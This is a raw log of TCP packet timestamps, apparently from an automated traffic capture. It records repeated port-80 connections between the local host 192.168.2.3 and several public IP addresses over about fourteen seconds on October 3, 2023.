                                                                    Oct 3, 2023 09:55:27.448828936 CEST8049884104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:27.448863029 CEST8049884104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:27.449064970 CEST4988480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:27.449857950 CEST4988480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:27.457443953 CEST8049885104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:27.457501888 CEST8049885104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:27.605070114 CEST4988680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:27.689929008 CEST8049885104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:27.689953089 CEST8049885104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:27.690123081 CEST4988580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:27.691226959 CEST4988580192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:27.700166941 CEST8049886172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:27.700256109 CEST4988680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:27.700529099 CEST4988680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:27.701097965 CEST4988680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:27.795691967 CEST8049886172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:27.795751095 CEST8049886172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:27.997961044 CEST4988780192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:28.074558973 CEST8049886172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:28.074620008 CEST8049886172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:28.074879885 CEST4988680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:28.075608969 CEST4988680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:28.093012094 CEST8049887104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:28.093209028 CEST4988780192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:28.093411922 CEST4988780192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:28.093903065 CEST4988780192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:28.190274954 CEST8049887104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:28.191055059 CEST8049887104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:28.199736118 CEST4988880192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:28.295030117 CEST8049888172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:28.295342922 CEST4988880192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:28.295427084 CEST4988880192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:28.295916080 CEST4988880192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:28.354546070 CEST8049887104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:28.354573965 CEST8049887104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:28.354635000 CEST4988780192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:28.355902910 CEST4988780192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:28.390418053 CEST8049888172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:28.391330004 CEST8049888172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:28.471436977 CEST4988980192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:28.566567898 CEST8049889104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:28.566912889 CEST4988980192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:28.568141937 CEST4988980192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:28.568403006 CEST4988980192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:28.663328886 CEST8049889104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:28.663438082 CEST8049889104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:28.666513920 CEST8049888172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:28.666570902 CEST8049888172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:28.666757107 CEST4988880192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:28.667773962 CEST4988880192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:28.792272091 CEST4989080192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:28.887603045 CEST8049890104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:28.887732029 CEST4989080192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:28.888740063 CEST4989080192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:28.889103889 CEST4989080192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:28.894670963 CEST8049889104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:28.894706011 CEST8049889104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:28.894793987 CEST4988980192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:28.895823956 CEST4988980192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:28.985805988 CEST8049890104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:28.987158060 CEST8049890104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:29.010318041 CEST4989180192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:29.105586052 CEST8049891172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:29.105747938 CEST4989180192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:29.105947018 CEST4989180192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:29.106681108 CEST4989180192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:29.200980902 CEST8049891172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:29.201286077 CEST8049891172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:29.262274981 CEST8049890104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:29.262336016 CEST8049890104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:29.262474060 CEST4989080192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:29.264020920 CEST4989080192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:29.348304987 CEST8049891172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:29.348336935 CEST8049891172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:29.348418951 CEST4989180192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:29.350197077 CEST4989180192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:29.400659084 CEST4989280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:29.466861010 CEST4989380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:29.495491028 CEST8049892104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:29.495687962 CEST4989280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:29.495928049 CEST4989280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:29.496331930 CEST4989280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:29.562156916 CEST8049893104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:29.562458038 CEST4989380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:29.562633991 CEST4989380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:29.563908100 CEST4989380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:29.590728998 CEST8049892104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:29.590837955 CEST8049892104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:29.657613993 CEST8049893104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:29.659441948 CEST8049893104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:29.857815981 CEST8049892104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:29.857877970 CEST8049892104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:29.858170033 CEST4989280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:29.859092951 CEST4989280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:29.980986118 CEST4989480192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:30.075988054 CEST8049894172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:30.076267004 CEST4989480192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:30.076447964 CEST4989480192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:30.076858997 CEST4989480192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:30.171350002 CEST8049894172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:30.171407938 CEST8049894172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:30.450153112 CEST8049894172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:30.450213909 CEST8049894172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:30.450361967 CEST4989480192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:30.451319933 CEST4989480192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:30.578352928 CEST4989580192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:30.673279047 CEST8049895104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:30.673541069 CEST4989580192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:30.673625946 CEST4989580192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:30.674078941 CEST4989580192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:30.768359900 CEST8049895104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:30.768630981 CEST8049895104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:30.914094925 CEST8049893104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:30.914134026 CEST8049893104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:30.914230108 CEST4989380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:30.915498018 CEST4989380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:30.952984095 CEST8049895104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:30.953022957 CEST8049895104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:30.953100920 CEST4989580192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:30.957416058 CEST4989580192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:31.053525925 CEST4989780192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:31.070903063 CEST4989880192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:31.148307085 CEST8049897104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:31.148417950 CEST4989780192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:31.148581028 CEST4989780192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:31.149017096 CEST4989780192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:31.165997982 CEST8049898172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:31.166089058 CEST4989880192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:31.166299105 CEST4989880192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:31.166668892 CEST4989880192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:31.243314981 CEST8049897104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:31.243664026 CEST8049897104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:31.260680914 CEST8049898172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:31.261044979 CEST8049898172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:31.550868034 CEST8049897104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:31.550925016 CEST8049897104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:31.550997972 CEST4989780192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:31.552090883 CEST4989780192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:31.632762909 CEST8049898172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:31.632834911 CEST8049898172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:31.632968903 CEST4989880192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:31.633785963 CEST4989880192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:31.692388058 CEST4989980192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:31.787250996 CEST8049899172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:31.787355900 CEST4989980192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:31.787524939 CEST4989980192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:31.787950993 CEST4989980192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:31.882055044 CEST8049899172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:31.882389069 CEST8049899172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:32.229742050 CEST8049899172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:32.229799986 CEST8049899172.67.151.219192.168.2.3
                                                                    Oct 3, 2023 09:55:32.229934931 CEST4989980192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:32.231024027 CEST4989980192.168.2.3172.67.151.219
                                                                    Oct 3, 2023 09:55:32.365145922 CEST4990080192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:32.460290909 CEST8049900104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:32.460652113 CEST4990080192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:32.460652113 CEST4990080192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:32.460999012 CEST4990080192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:32.555847883 CEST8049900104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:32.555908918 CEST8049900104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:32.824086905 CEST8049900104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:32.824157000 CEST8049900104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:32.824353933 CEST4990080192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:32.825333118 CEST4990080192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:32.965183973 CEST4990180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:33.060497046 CEST8049901104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:33.060734034 CEST4990180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:33.060827971 CEST4990180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:33.061326981 CEST4990180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:33.156307936 CEST8049901104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:33.156368971 CEST8049901104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:33.428050995 CEST4990280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:33.523435116 CEST8049902104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:33.523967028 CEST4990280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:33.524224043 CEST4990280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:33.524410009 CEST4990280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:33.619272947 CEST8049902104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:33.619636059 CEST8049902104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:33.665677071 CEST8049901104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:33.665739059 CEST8049901104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:33.665921926 CEST4990180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:33.666918993 CEST4990180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:33.793329000 CEST4990380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:33.862191916 CEST8049902104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:33.862257004 CEST8049902104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:33.862435102 CEST4990280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:33.863311052 CEST4990280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:33.888698101 CEST8049903104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:33.888922930 CEST4990380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:33.888961077 CEST4990380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:33.889365911 CEST4990380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:33.992321014 CEST8049903104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:33.992381096 CEST8049903104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:33.999104023 CEST4990480192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:34.094050884 CEST8049904172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:34.094425917 CEST4990480192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:34.096066952 CEST4990480192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:34.096421957 CEST4990480192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:34.190804005 CEST8049904172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:34.190825939 CEST8049904172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:34.414865971 CEST8049904172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:34.414895058 CEST8049904172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:34.414994955 CEST4990480192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:34.416120052 CEST4990480192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:34.551361084 CEST4990680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:34.646229982 CEST8049906172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:34.646472931 CEST4990680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:34.646718979 CEST4990680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:34.647119999 CEST4990680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:34.741214991 CEST8049906172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:34.741755962 CEST8049906172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:34.972995996 CEST8049906172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:34.973027945 CEST8049906172.67.137.125192.168.2.3
                                                                    Oct 3, 2023 09:55:34.973119020 CEST4990680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:34.974200010 CEST4990680192.168.2.3172.67.137.125
                                                                    Oct 3, 2023 09:55:34.999891043 CEST8049903104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:34.999914885 CEST8049903104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:34.999974012 CEST4990380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:35.001420021 CEST4990380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:35.091604948 CEST4990780192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:35.153471947 CEST4990880192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:35.187457085 CEST8049907104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:35.187566996 CEST4990780192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:35.187988043 CEST4990780192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:35.188502073 CEST4990780192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:35.249723911 CEST8049908104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:35.249830961 CEST4990880192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:35.251135111 CEST4990880192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:35.251636028 CEST4990880192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:35.287754059 CEST8049907104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:35.287976027 CEST8049907104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:35.352061987 CEST8049908104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:35.352128029 CEST8049908104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:35.514544010 CEST8049907104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:35.514666080 CEST8049907104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:35.514903069 CEST4990780192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:35.515849113 CEST4990780192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:35.642267942 CEST4990980192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:35.739476919 CEST8049909104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:35.739608049 CEST4990980192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:35.739805937 CEST4990980192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:35.740236998 CEST4990980192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:35.834961891 CEST8049909104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:35.836142063 CEST8049909104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:35.975625992 CEST8049909104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:35.975692034 CEST8049909104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:35.975739956 CEST4990980192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:35.977520943 CEST4990980192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:36.128222942 CEST4991080192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:36.223757982 CEST8049910104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:36.224033117 CEST4991080192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:36.224134922 CEST4991080192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:36.224456072 CEST4991080192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:36.319411993 CEST8049910104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:36.319468975 CEST8049910104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:37.255652905 CEST8049908104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:37.255717993 CEST8049908104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:37.255809069 CEST4990880192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:37.461128950 CEST4990880192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:37.592711926 CEST4991180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:37.688268900 CEST8049911104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:37.688437939 CEST4991180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:37.688587904 CEST4991180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:37.689044952 CEST4991180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:37.783199072 CEST8049911104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:37.783421040 CEST8049911104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:38.883364916 CEST8049910104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:38.883426905 CEST8049910104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:38.883610010 CEST4991080192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:38.887403011 CEST4991080192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:39.022625923 CEST4991280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:39.119290113 CEST8049912104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:39.119590998 CEST4991280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:39.119782925 CEST4991280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:39.121269941 CEST4991280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:39.214711905 CEST8049912104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:39.216448069 CEST8049912104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.022811890 CEST8049912104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.022849083 CEST8049912104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.022973061 CEST4991280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.024475098 CEST4991280192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.106264114 CEST8049911104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:41.106484890 CEST8049911104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:41.106632948 CEST4991180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:41.107728958 CEST4991180192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:41.240860939 CEST4991380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:41.336035967 CEST8049913104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:41.336146116 CEST4991380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:41.336431980 CEST4991380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:41.336878061 CEST4991380192.168.2.3104.21.1.18
                                                                    Oct 3, 2023 09:55:41.434767008 CEST8049913104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:41.434803009 CEST8049913104.21.1.18192.168.2.3
                                                                    Oct 3, 2023 09:55:41.443794012 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.539076090 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.539314985 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.539503098 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.540349007 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.634829998 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.635037899 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.635436058 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.635489941 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.635524988 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.635525942 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.635559082 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.635564089 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.635591030 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.635598898 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.635605097 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.635618925 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.635632038 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.635659933 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.635668039 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.635698080 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.635730982 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.635843992 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.635906935 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.732064009 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.732127905 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.732167006 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.732197046 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.732202053 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.732234001 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.732239008 CEST8049914104.21.81.17192.168.2.3
                                                                    Oct 3, 2023 09:55:41.732245922 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.732275009 CEST4991480192.168.2.3104.21.81.17
                                                                    Oct 3, 2023 09:55:41.732276917 CEST8049914104.21.81.17192.168.2.3
